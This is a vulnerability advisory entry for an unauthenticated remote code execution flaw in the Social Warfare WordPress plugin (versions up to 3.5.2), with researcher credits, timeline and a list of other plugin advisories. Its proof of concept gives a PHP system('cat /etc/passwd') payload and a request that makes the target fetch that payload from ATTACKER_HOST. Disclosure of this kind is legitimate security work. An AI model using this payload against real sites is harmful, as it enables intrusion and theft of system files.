Social Warfare <= 3.5.2 – Unauthenticated Remote Code Execution (RCE) | Plugin Vulnerabilities

Description

Unauthenticated remote code execution has been discovered in functionality that handles settings import.

Proof of Concept

1. Create payload file and host it on a location accessible by a targeted website. Payload content : "<pre>system('cat /etc/passwd')</pre>"

2. Visit http://WEBSITE/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://ATTACKER_HOST/payload.txt

3. Content of /etc/passwd will be returned

Affects Plugins

Fixed in 3.5.3

References

URL

https://www.webarxsecurity.com/social-warfare-vulnerability/

Classification

Type

RCE

OWASP top 10

CWE

Miscellaneous

Original Researcher

Luka Sikic

Submitter

Luka Sikic

Submitter website

https://www.webarxsecurity.com

Submitter twitter

webarx_security

Verified

No

WPVDB ID

7b412469-cc03-4899-b397-38580ced5618

Timeline

Publicly Published

2019-03-25 (about 5 years ago)

Added

2019-04-24 (about 5 years ago)

Last Updated

2021-06-08 (about 2 years ago)

Other

Published

Title

Published

2022-02-08

Title

PHP Everywhere < 3.0.0 - Subscriber+ RCE via Shortcode

Published

2021-05-14

Title

WP Super Cache < 1.7.3 - Authenticated Remote Code Execution

Published

2015-04-02

Title

SimpleCart - File Upload & Execution

Published

2020-10-09

Title

Autoptimize < 2.7.8 - Race Condition leading to RCE

Published

2022-04-12

Title

Multiple Plugins from Cool Plugins - Subscriber+ Arbitrary Plugin Installation & Activation